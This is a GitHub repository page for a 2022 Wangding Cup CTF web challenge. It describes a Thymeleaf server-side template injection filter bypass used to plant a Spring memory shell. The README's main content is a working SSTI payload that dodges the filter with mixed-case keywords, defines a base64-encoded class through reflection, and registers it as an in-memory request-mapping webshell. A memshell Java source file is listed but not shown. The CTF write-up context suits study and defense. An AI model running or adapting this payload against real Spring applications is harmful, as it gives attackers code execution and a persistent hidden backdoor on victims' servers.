Skip to content
/ wangding_2022_ctf_findit Public

2022 网鼎杯 玄武 web ctf thymeleaf SSTI bypass and memshell

License

MIT license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

testivy/wangding_2022_ctf_findit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

SpringRequestMappingMemshell.java

SpringRequestMappingMemshell.java

 
 

Repository files navigation

CTF-you-can-find-it

2022 网鼎杯 玄武组 web ctf thymeleaf SSTI bypass and memshell to retrive flag

先知文章:https://xz.aliyun.com/t/11688

__${T (org.springframework.cglib.core.ReflectUtils).defineClass("SpringRequestMappingMemshell", 
T (org.springframework.util.Base64Utils).decodeFromUrlSafeString("SpringRequestMappingMemshell.class的UrlSafebase64编码"), 
nEw javax.management.loading.MLet(NeW java.net.URL("http","127.0.0.1","1.txt"),T (java.lang.Thread).currentThread().getContextClassLoader())).doInject(T (org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT",0).getBean(T (Class).forName("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping")))}__::main.x

About

2022 网鼎杯 玄武 web ctf thymeleaf SSTI bypass and memshell

Topics

spring thymeleaf bypass ssti

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages